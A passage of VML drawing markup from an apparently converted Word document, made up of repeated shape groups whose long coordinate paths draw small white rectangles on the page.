2128,10617,2128,10616,2128,10615,2128,10614,2128,10612,2128,10611,2128,10610,2128,10609,2128,10607,2128,10606,2128,10605,2128,10603,2128,10602,2128,10600,2128,10598,2128,10597,2128,10595,2128,10593,2128,10591,2128,10589,2128,10587,2128,10585,2128,10583,2128,10581,2128,10579,2128,10577,2128,10574,2128,10572,2128,10570,2128,10567,2128,10565,2128,10562,2128,10559,2128,10557,2128,10554,2128,10551,2128,10548,2128,10545,2128,10542,2128,10539,2128,10536,2128,10532,2128,10529,2128,10526,2128,10522,2128,10518,2128,10515,2128,10511,2128,10507,2128,10503,2128,10499,2128,10495,2128,10491,2128,10487,2128,10483,2128,10478,2128,10474,2128,10469,2128,10465,2128,10460,2128,10455,2128,10450,2128,10445,2128,10440,2128,10435,2128,10430,2128,10425,2128,10419,2128,10414e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:519.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,10390" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:10390;width:110;height:230" coordorigin="2530,10390" coordsize="110,230" path="m2543,10414l2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2543,10414,2544,10414,2544,10414,2544,10414,2544,10414,2544,10414,2544,10414,2544,10414,2545,10414,2545,10414,2545,10414,2545,10414,2545,10414,2546,10414,2546,10414,2546,10414,2547,10414,2547,10414,2547,10414,2548,10414,2548,10414,2548,10414,2549,10414,2549,10414,2549,10414,2550,10414,2550,10414,2551,10414,2551,10414,2552,10414,2552,10414,2553,10414,2553,10414,2554,10414,2555,10414,2555,10414,2556,10414,2557,10414,2557,10414,2558,10414,2559,10414,2560,10414,2560,10414,2561,10414,2562,10414,2563,10414,2564,10414,2565,10414,2566,10414,2567,10414,2568,10414,2569,10414,2570,10414,2571,10414,2572,10414,2573,10414,2574,10414,2575,10414,2577,10414,2578,10414,2579,10414,2580,10414,2582,10414,2583,10414,2585,10414,2586,10414,2587,10414,2589,10414,2591,10414,2592,10414,2594,10414,2595,10414,2597,10414,2599,10414,2601,10414,2602,10414,2604,10414,2606,10414,2608,10414,2610,10414,2612,10414,2614,10414,2616,10414,2618,10414,2620,10414,2622,10414,2625,10414,2627,10414,2629,10414,2631,10414,2634,10414,2636,10414,2639,10414,2641,10414,2644,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10414,2646,10415,2646,10415,2646,10415,2646,10415,2646,10415,2646,10415,2646,10416,2646,10416,2646,10416,2646,10416,2646,10417,2646,10417,2646,10417,2646,10418,2646,10418,2646,10418,2646,10419,2646,10419,2646,10420,2646,10420,2646,10421,2646,10422,2646,10422,2646,10423,2646,10423,2646,10424,2646,10425,2646,10426,2646,10427,2646,10427,2646,10428,2646,10429,2646,10430,2646,10431,2646,10432,2646,10433,2646,10434,2646,10436,2646,10437,2646,10438,2646,10439,2646,10441,2646,10442,2646,10443,2646,10445,2646,10446,2646,10448,2646,10450,2646,10451,2646,10453,2646,10455,2646,10457,2646,10459,2646,10461,2646,10463,2646,10465,2646,10467,2646,10469,2646,10471,2646,10473,2646,10476,2646,10478,2646,10481,2646,10483,2646,10486,2646,10489,2646,10491,2646,10494,2646,10497,2646,10500,2646,10503,2646,10506,2646,10509,2646,10512,2646,10516,2646,10519,2646,10522,2646,10526,2646,10530,2646,10533,2646,10537,2646,10541,2646,10545,2646,10549,2646,10553,2646,10557,2646,10561,2646,10565,2646,10570,2646,10574,2646,10579,2646,10583,2646,10588,2646,10593,2646,10598,2646,10603,2646,10608,2646,10613,2646,10618,2646,10623,2646,10629,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2646,10634,2645,10634,2645,10634,2645,10634,2645,10634,2645,10634,2645,10634,2645,10634,2644,10634,2644,10634,2644,10634,2644,10634,2643,10634,2643,10634,2643,10634,2643,10634,2642,10634,2642,10634,2642,10634,2641,10634,2641,10634,2641,10634,2640,10634,2640,10634,2640,10634,2639,10634,2639,10634,2638,10634,2638,10634,2637,10634,2637,10634,2636,10634,2636,10634,2635,10634,2634,10634,2634,10634,2633,10634,2632,10634,2632,10634,2631,10634,2630,10634,2629,10634,2629,10634,2628,10634,2627,10634,2626,10634,2625,10634,2624,10634,2623,10634,2622,10634,2621,10634,2620,10634,2619,10634,2618,10634,2617,10634,2616,10634,2615,10634,2614,10634,2612,10634,2611,10634,2610,10634,2609,10634,2607,10634,2606,10634,2604,10634,2603,10634,2601,10634,2600,10634,2598,10634,2597,10634,2595,10634,2594,10634,2592,10634,2590,10634,2588,10634,2587,10634,2585,10634,2583,10634,2581,10634,2579,10634,2577,10634,2575,10634,2573,10634,2571,10634,2569,10634,2567,10634,2564,10634,2562,10634,2560,10634,2558,10634,2555,10634,2553,10634,2550,10634,2548,10634,2545,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10634,2543,10633,2543,10633,2543,10633,2543,10633,2543,10633,2543,10633,2543,10632,2543,10632,2543,10632,2543,10632,2543,10631,2543,10631,2543,10631,2543,10630,2543,10630,2543,10630,2543,10629,2543,10629,2543,10628,2543,10628,2543,10627,2543,10626,2543,10626,2543,10625,2543,10625,2543,10624,2543,10623,2543,10622,2543,10621,2543,10621,2543,10620,2543,10619,2543,10618,2543,10617,2543,10616,2543,10615,2543,10614,2543,10612,2543,10611,2543,10610,2543,10609,2543,10607,2543,10606,2543,10605,2543,10603,2543,10602,2543,10600,2543,10598,2543,10597,2543,10595,2543,10593,2543,10591,2543,10589,2543,10587,2543,10585,2543,10583,2543,10581,2543,10579,2543,10577,2543,10574,2543,10572,2543,10570,2543,10567,2543,10565,2543,10562,2543,10559,2543,10557,2543,10554,2543,10551,2543,10548,2543,10545,2543,10542,2543,10539,2543,10536,2543,10532,2543,10529,2543,10526,2543,10522,2543,10518,2543,10515,2543,10511,2543,10507,2543,10503,2543,10499,2543,10495,2543,10491,2543,10487,2543,10483,2543,10478,2543,10474,2543,10469,2543,10465,2543,10460,2543,10455,2543,10450,2543,10445,2543,10440,2543,10435,2543,10430,2543,10425,2543,10419,2543,10414e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:546.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,10930" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:10930;width:110;height:230" coordorigin="2110,10930" coordsize="110,230" path="m2128,10958l2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2128,10958,2129,10958,2129,10958,2129,10958,2129,10958,2129,10958,2129,10958,2129,10958,2129,10958,2130,10958,2130,10958,2130,10958,2130,10958,2131,10958,2131,10958,2131,10958,2131,10958,2132,10958,2132,10958,2132,10958,2133,10958,2133,10958,2133,10958,2134,10958,2134,10958,2134,10958,2135,10958,2135,10958,2136,10958,2136,10958,2137,10958,2137,10958,2138,10958,2138,10958,2139,10958,2140,10958,2140,10958,2141,10958,2142,10958,2142,10958,2143,10958,2144,10958,2145,10958,2145,10958,2146,10958,2147,10958,2148,10958,2149,10958,2150,10958,2151,10958,2152,10958,2153,10958,2154,10958,2155,10958,2156,10958,2157,10958,2158,10958,2159,10958,2160,10958,2162,10958,2163,10958,2164,10958,2165,10958,2167,10958,2168,10958,2170,10958,2171,10958,2173,10958,2174,10958,2176,10958,2177,10958,2179,10958,2180,10958,2182,10958,2184,10958,2186,10958,2187,10958,2189,10958,2191,10958,2193,10958,2195,10958,2197,10958,2199,10958,2201,10958,2203,10958,2205,10958,2207,10958,2210,10958,2212,10958,2214,10958,2216,10958,2219,10958,2221,10958,2224,10958,2226,10958,2229,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10958,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10959,2231,10960,2231,10960,2231,10960,2231,10960,2231,10960,2231,10961,2231,10961,2231,10961,2231,10962,2231,10962,2231,10962,2231,10963,2231,10963,2231,10964,2231,10964,2231,10965,2231,10965,2231,10966,2231,10966,2231,10967,2231,10967,2231,10968,2231,10969,2231,10970,2231,10970,2231,10971,2231,10972,2231,10973,2231,10974,2231,10975,2231,10976,2231,10977,2231,10978,2231,10979,2231,10980,2231,10981,2231,10983,2231,10984,2231,10985,2231,10987,2231,10988,2231,10990,2231,10991,2231,10993,2231,10994,2231,10996,2231,10998,2231,11000,2231,11001,2231,11003,2231,11005,2231,11007,2231,11009,2231,11011,2231,11014,2231,11016,2231,11018,2231,11020,2231,11023,2231,11025,2231,11028,2231,11031,2231,11033,2231,11036,2231,11039,2231,11042,2231,11045,2231,11048,2231,11051,2231,11054,2231,11057,2231,11060,2231,11064,2231,11067,2231,11071,2231,11074,2231,11078,2231,11082,2231,11085,2231,11089,2231,11093,2231,11097,2231,11101,2231,11106,2231,11110,2231,11114,2231,11119,2231,11123,2231,11128,2231,11133,2231,11137,2231,11142,2231,11147,2231,11152,2231,11157,2231,11163,2231,11168,2231,11173,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2231,11179,2230,11179,2230,11179,2230,11179,2230,11179,2230,11179,2230,11179,2230,11179,2229,11179,2229,11179,2229,11179,2229,11179,2229,11179,2228,11179,2228,11179,2228,11179,2227,11179,2227,11179,2227,11179,2227,11179,2226,11179,2226,11179,2225,11179,2225,11179,2225,11179,2224,11179,2224,11179,2223,11179,2223,11179,2222,11179,2222,11179,2221,11179,2221,11179,2220,11179,2219,11179,2219,11179,2218,11179,2217,11179,2217,11179,2216,11179,2215,11179,2214,11179,2214,11179,2213,11179,2212,11179,2211,11179,2210,11179,2209,11179,2208,11179,2207,11179,2206,11179,2205,11179,2204,11179,2203,11179,2202,11179,2201,11179,2200,11179,2199,11179,2197,11179,2196,11179,2195,11179,2194,11179,2192,11179,2191,11179,2189,11179,2188,11179,2187,11179,2185,11179,2183,11179,2182,11179,2180,11179,2179,11179,2177,11179,2175,11179,2173,11179,2172,11179,2170,11179,2168,11179,2166,11179,2164,11179,2162,11179,2160,11179,2158,11179,2156,11179,2154,11179,2152,11179,2149,11179,2147,11179,2145,11179,2143,11179,2140,11179,2138,11179,2135,11179,2133,11179,2130,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11179,2128,11178,2128,11178,2128,11178,2128,11178,2128,11178,2128,11178,2128,11178,2128,11178,2128,11177,2128,11177,2128,11177,2128,11177,2128,11177,2128,11176,2128,11176,2128,11176,2128,11175,2128,11175,2128,11175,2128,11174,2128,11174,2128,11173,2128,11173,2128,11172,2128,11172,2128,11171,2128,11170,2128,11170,2128,11169,2128,11168,2128,11168,2128,11167,2128,11166,2128,11165,2128,11164,2128,11163,2128,11162,2128,11161,2128,11160,2128,11159,2128,11158,2128,11157,2128,11156,2128,11155,2128,11153,2128,11152,2128,11151,2128,11149,2128,11148,2128,11146,2128,11145,2128,11143,2128,11141,2128,11140,2128,11138,2128,11136,2128,11134,2128,11132,2128,11130,2128,11128,2128,11126,2128,11124,2128,11121,2128,11119,2128,11117,2128,11114,2128,11112,2128,11109,2128,11107,2128,11104,2128,11101,2128,11099,2128,11096,2128,11093,2128,11090,2128,11087,2128,11083,2128,11080,2128,11077,2128,11074,2128,11070,2128,11067,2128,11063,2128,11059,2128,11056,2128,11052,2128,11048,2128,11044,2128,11040,2128,11036,2128,11032,2128,11027,2128,11023,2128,11019,2128,11014,2128,11009,2128,11005,2128,11000,2128,10995,2128,10990,2128,10985,2128,10980,2128,10975,2128,10969,2128,10964,2128,10958e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:546.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,10930" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:10930;width:110;height:230" coordorigin="2530,10930" coordsize="110,230" path="m2543,10958l2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2543,10958,2544,10958,2544,10958,2544,10958,2544,10958,2544,10958,2544,10958,2544,10958,2545,10958,2545,10958,2545,10958,2545,10958,2545,10958,2546,10958,2546,10958,2546,10958,2547,10958,2547,10958,2547,10958,2548,10958,2548,10958,2548,10958,2549,10958,2549,10958,2549,10958,2550,10958,2550,10958,2551,10958,2551,10958,2552,10958,2552,10958,2553,10958,2553,10958,2554,10958,2555,10958,2555,10958,2556,10958,2557,10958,2557,10958,2558,10958,2559,10958,2560,10958,2560,10958,2561,10958,2562,10958,2563,10958,2564,10958,2565,10958,2566,10958,2567,10958,2568,10958,2569,10958,2570,10958,2571,10958,2572,10958,2573,10958,2574,10958,2575,10958,2577,10958,2578,10958,2579,10958,2580,10958,2582,10958,2583,10958,2585,10958,2586,10958,2587,10958,2589,10958,2591,10958,2592,10958,2594,10958,2595,10958,2597,10958,2599,10958,2601,10958,2602,10958,2604,10958,2606,10958,2608,10958,2610,10958,2612,10958,2614,10958,2616,10958,2618,10958,2620,10958,2622,10958,2625,10958,2627,10958,2629,10958,2631,10958,2634,10958,2636,10958,2639,10958,2641,10958,2644,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10958,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10959,2646,10960,2646,10960,2646,10960,2646,10960,2646,10960,2646,10961,2646,10961,2646,10961,2646,10962,2646,10962,2646,10962,2646,10963,2646,10963,2646,10964,2646,10964,2646,10965,2646,10965,2646,10966,2646,10966,2646,10967,2646,10967,2646,10968,2646,10969,2646,10970,2646,10970,2646,10971,2646,10972,2646,10973,2646,10974,2646,10975,2646,10976,2646,10977,2646,10978,2646,10979,2646,10980,2646,10981,2646,10983,2646,10984,2646,10985,2646,10987,2646,10988,2646,10990,2646,10991,2646,10993,2646,10994,2646,10996,2646,10998,2646,11000,2646,11001,2646,11003,2646,11005,2646,11007,2646,11009,2646,11011,2646,11014,2646,11016,2646,11018,2646,11020,2646,11023,2646,11025,2646,11028,2646,11031,2646,11033,2646,11036,2646,11039,2646,11042,2646,11045,2646,11048,2646,11051,2646,11054,2646,11057,2646,11060,2646,11064,2646,11067,2646,11071,2646,11074,2646,11078,2646,11082,2646,11085,2646,11089,2646,11093,2646,11097,2646,11101,2646,11106,2646,11110,2646,11114,2646,11119,2646,11123,2646,11128,2646,11133,2646,11137,2646,11142,2646,11147,2646,11152,2646,11157,2646,11163,2646,11168,2646,11173,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2646,11179,2645,11179,2645,11179,2645,11179,2645,11179,2645,11179,2645,11179,2645,11179,2644,11179,2644,11179,2644,11179,2644,11179,2643,11179,2643,11179,2643,11179,2643,11179,2642,11179,2642,11179,2642,11179,2641,11179,2641,11179,2641,11179,2640,11179,2640,11179,2640,11179,2639,11179,2639,11179,2638,11179,2638,11179,2637,11179,2637,11179,2636,11179,2636,11179,2635,11179,2634,11179,2634,11179,2633,11179,2632,11179,2632,11179,2631,11179,2630,11179,2629,11179,2629,11179,2628,11179,2627,11179,2626,11179,2625,11179,2624,11179,2623,11179,2622,11179,2621,11179,2620,11179,2619,11179,2618,11179,2617,11179,2616,11179,2615,11179,2614,11179,2612,11179,2611,11179,2610,11179,2609,11179,2607,11179,2606,11179,2604,11179,2603,11179,2601,11179,2600,11179,2598,11179,2597,11179,2595,11179,2594,11179,2592,11179,2590,11179,2588,11179,2587,11179,2585,11179,2583,11179,2581,11179,2579,11179,2577,11179,2575,11179,2573,11179,2571,11179,2569,11179,2567,11179,2564,11179,2562,11179,2560,11179,2558,11179,2555,11179,2553,11179,2550,11179,2548,11179,2545,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11179,2543,11178,2543,11178,2543,11178,2543,11178,2543,11178,2543,11178,2543,11178,2543,11178,2543,11177,2543,11177,2543,11177,2543,11177,2543,11177,2543,11176,2543,11176,2543,11176,2543,11175,2543,11175,2543,11175,2543,11174,2543,11174,2543,11173,2543,11173,2543,11172,2543,11172,2543,11171,2543,11170,2543,11170,2543,11169,2543,11168,2543,11168,2543,11167,2543,11166,2543,11165,2543,11164,2543,11163,2543,11162,2543,11161,2543,11160,2543,11159,2543,11158,2543,11157,2543,11156,2543,11155,2543,11153,2543,11152,2543,11151,2543,11149,2543,11148,2543,11146,2543,11145,2543,11143,2543,11141,2543,11140,2543,11138,2543,11136,2543,11134,2543,11132,2543,11130,2543,11128,2543,11126,2543,11124,2543,11121,2543,11119,2543,11117,2543,11114,2543,11112,2543,11109,2543,11107,2543,11104,2543,11101,2543,11099,2543,11096,2543,11093,2543,11090,2543,11087,2543,11083,2543,11080,2543,11077,2543,11074,2543,11070,2543,11067,2543,11063,2543,11059,2543,11056,2543,11052,2543,11048,2543,11044,2543,11040,2543,11036,2543,11032,2543,11027,2543,11023,2543,11019,2543,11014,2543,11009,2543,11005,2543,11000,2543,10995,2543,10990,2543,10985,2543,10980,2543,10975,2543,10969,2543,10964,2543,10958e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:574.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,11490" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:11490;width:110;height:230" coordorigin="2110,11490" coordsize="110,230" path="m2128,11516l2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2128,11516,2129,11516,2129,11516,2129,11516,2129,11516,2129,11516,2129,11516,2129,11516,2129,11516,2130,11516,2130,11516,2130,11516,2130,11516,2131,11516,2131,11516,2131,11516,2131,11516,2132,11516,2132,11516,2132,11516,2133,11516,2133,11516,2133,11516,2134,11516,2134,11516,2134,11516,2135,11516,2135,11516,2136,11516,2136,11516,2137,11516,2137,11516,2138,11516,2138,11516,2139,11516,2140,11516,2140,11516,2141,11516,2142,11516,2142,11516,2143,11516,2144,11516,2145,11516,2145,11516,2146,11516,2147,11516,2148,11516,2149,11516,2150,11516,2151,11516,2152,11516,2153,11516,2154,11516,2155,11516,2156,11516,2157,11516,2158,11516,2159,11516,2160,11516,2162,11516,2163,11516,2164,11516,2165,11516,2167,11516,2168,11516,2170,11516,2171,11516,2173,11516,2174,11516,2176,11516,2177,11516,2179,11516,2180,11516,2182,11516,2184,11516,2186,11516,2187,11516,2189,11516,2191,11516,2193,11516,2195,11516,2197,11516,2199,11516,2201,11516,2203,11516,2205,11516,2207,11516,2210,11516,2212,11516,2214,11516,2216,11516,2219,11516,2221,11516,2224,11516,2226,11516,2229,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11516,2231,11517,2231,11517,2231,11517,2231,11517,2231,11517,2231,11517,2231,11517,2231,11518,2231,11518,2231,11518,2231,11518,2231,11519,2231,11519,2231,11519,2231,11520,2231,11520,2231,11520,2231,11521,2231,11521,2231,11522,2231,11522,2231,11523,2231,11523,2231,11524,2231,11524,2231,11525,2231,11526,2231,11526,2231,11527,2231,11528,2231,11529,2231,11530,2231,11530,2231,11531,2231,11532,2231,11533,2231,11534,2231,11535,2231,11537,2231,11538,2231,11539,2231,11540,2231,11542,2231,11543,2231,11544,2231,11546,2231,11547,2231,11549,2231,11550,2231,11552,2231,11554,2231,11555,2231,11557,2231,11559,2231,11561,2231,11563,2231,11565,2231,11567,2231,11569,2231,11571,2231,11573,2231,11576,2231,11578,2231,11580,2231,11583,2231,11586,2231,11588,2231,11591,2231,11594,2231,11596,2231,11599,2231,11602,2231,11605,2231,11608,2231,11611,2231,11615,2231,11618,2231,11621,2231,11625,2231,11628,2231,11632,2231,11635,2231,11639,2231,11643,2231,11647,2231,11651,2231,11655,2231,11659,2231,11663,2231,11667,2231,11672,2231,11676,2231,11681,2231,11685,2231,11690,2231,11695,2231,11700,2231,11705,2231,11710,2231,11715,2231,11720,2231,11726,2231,11731,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2231,11736,2230,11736,2230,11736,2230,11736,2230,11736,2230,11736,2230,11736,2230,11736,2229,11736,2229,11736,2229,11736,2229,11736,2229,11736,2228,11736,2228,11736,2228,11736,2227,11736,2227,11736,2227,11736,2227,11736,2226,11736,2226,11736,2225,11736,2225,11736,2225,11736,2224,11736,2224,11736,2223,11736,2223,11736,2222,11736,2222,11736,2221,11736,2221,11736,2220,11736,2219,11736,2219,11736,2218,11736,2217,11736,2217,11736,2216,11736,2215,11736,2214,11736,2214,11736,2213,11736,2212,11736,2211,11736,2210,11736,2209,11736,2208,11736,2207,11736,2206,11736,2205,11736,2204,11736,2203,11736,2202,11736,2201,11736,2200,11736,2199,11736,2197,11736,2196,11736,2195,11736,2194,11736,2192,11736,2191,11736,2189,11736,2188,11736,2187,11736,2185,11736,2183,11736,2182,11736,2180,11736,2179,11736,2177,11736,2175,11736,2173,11736,2172,11736,2170,11736,2168,11736,2166,11736,2164,11736,2162,11736,2160,11736,2158,11736,2156,11736,2154,11736,2152,11736,2149,11736,2147,11736,2145,11736,2143,11736,2140,11736,2138,11736,2135,11736,2133,11736,2130,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11736,2128,11735,2128,11735,2128,11735,2128,11735,2128,11735,2128,11734,2128,11734,2128,11734,2128,11734,2128,11733,2128,11733,2128,11733,2128,11732,2128,11732,2128,11731,2128,11731,2128,11730,2128,11730,2128,11729,2128,11729,2128,11728,2128,11727,2128,11727,2128,11726,2128,11725,2128,11725,2128,11724,2128,11723,2128,11722,2128,11721,2128,11720,2128,11719,2128,11718,2128,11717,2128,11716,2128,11715,2128,11713,2128,11712,2128,11711,2128,11710,2128,11708,2128,11707,2128,11705,2128,11704,2128,11702,2128,11701,2128,11699,2128,11697,2128,11695,2128,11693,2128,11692,2128,11690,2128,11688,2128,11686,2128,11683,2128,11681,2128,11679,2128,11677,2128,11674,2128,11672,2128,11669,2128,11667,2128,11664,2128,11662,2128,11659,2128,11656,2128,11653,2128,11650,2128,11647,2128,11644,2128,11641,2128,11638,2128,11635,2128,11631,2128,11628,2128,11624,2128,11621,2128,11617,2128,11613,2128,11610,2128,11606,2128,11602,2128,11598,2128,11593,2128,11589,2128,11585,2128,11581,2128,11576,2128,11572,2128,11567,2128,11562,2128,11558,2128,11553,2128,11548,2128,11543,2128,11537,2128,11532,2128,11527,2128,11522,2128,11516e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:574.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,11490" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:11490;width:110;height:230" coordorigin="2530,11490" coordsize="110,230" path="m2543,11516l2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2543,11516,2544,11516,2544,11516,2544,11516,2544,11516,2544,11516,2544,11516,2544,11516,2545,11516,2545,11516,2545,11516,2545,11516,2545,11516,2546,11516,2546,11516,2546,11516,2547,11516,2547,11516,2547,11516,2548,11516,2548,11516,2548,11516,2549,11516,2549,11516,2549,11516,2550,11516,2550,11516,2551,11516,2551,11516,2552,11516,2552,11516,2553,11516,2553,11516,2554,11516,2555,11516,2555,11516,2556,11516,2557,11516,2557,11516,2558,11516,2559,11516,2560,11516,2560,11516,2561,11516,2562,11516,2563,11516,2564,11516,2565,11516,2566,11516,2567,11516,2568,11516,2569,11516,2570,11516,2571,11516,2572,11516,2573,11516,2574,11516,2575,11516,2577,11516,2578,11516,2579,11516,2580,11516,2582,11516,2583,11516,2585,11516,2586,11516,2587,11516,2589,11516,2591,11516,2592,11516,2594,11516,2595,11516,2597,11516,2599,11516,2601,11516,2602,11516,2604,11516,2606,11516,2608,11516,2610,11516,2612,11516,2614,11516,2616,11516,2618,11516,2620,11516,2622,11516,2625,11516,2627,11516,2629,11516,2631,11516,2634,11516,2636,11516,2639,11516,2641,11516,2644,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11516,2646,11517,2646,11517,2646,11517,2646,11517,2646,11517,2646,11517,2646,11517,2646,11518,2646,11518,2646,11518,2646,11518,2646,11519,2646,11519,2646,11519,2646,11520,2646,11520,2646,11520,2646,11521,2646,11521,2646,11522,2646,11522,2646,11523,2646,11523,2646,11524,2646,11524,2646,11525,2646,11526,2646,11526,2646,11527,2646,11528,2646,11529,2646,11530,2646,11530,2646,11531,2646,11532,2646,11533,2646,11534,2646,11535,2646,11537,2646,11538,2646,11539,2646,11540,2646,11542,2646,11543,2646,11544,2646,11546,2646,11547,2646,11549,2646,11550,2646,11552,2646,11554,2646,11555,2646,11557,2646,11559,2646,11561,2646,11563,2646,11565,2646,11567,2646,11569,2646,11571,2646,11573,2646,11576,2646,11578,2646,11580,2646,11583,2646,11586,2646,11588,2646,11591,2646,11594,2646,11596,2646,11599,2646,11602,2646,11605,2646,11608,2646,11611,2646,11615,2646,11618,2646,11621,2646,11625,2646,11628,2646,11632,2646,11635,2646,11639,2646,11643,2646,11647,2646,11651,2646,11655,2646,11659,2646,11663,2646,11667,2646,11672,2646,11676,2646,11681,2646,11685,2646,11690,2646,11695,2646,11700,2646,11705,2646,11710,2646,11715,2646,11720,2646,11726,2646,11731,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2646,11736,2645,11736,2645,11736,2645,11736,2645,11736,2645,11736,2645,11736,2645,11736,2644,11736,2644,11736,2644,11736,2644,11736,2643,11736,2643,11736,2643,11736,2643,11736,2642,11736,2642,11736,2642,11736,2641,11736,2641,11736,2641,11736,2640,11736,2640,11736,2640,11736,2639,11736,2639,11736,2638,11736,2638,11736,2637,11736,2637,11736,2636,11736,2636,11736,2635,11736,2634,11736,2634,11736,2633,11736,2632,11736,2632,11736,2631,11736,2630,11736,2629,11736,2629,11736,2628,11736,2627,11736,2626,11736,2625,11736,2624,11736,2623,11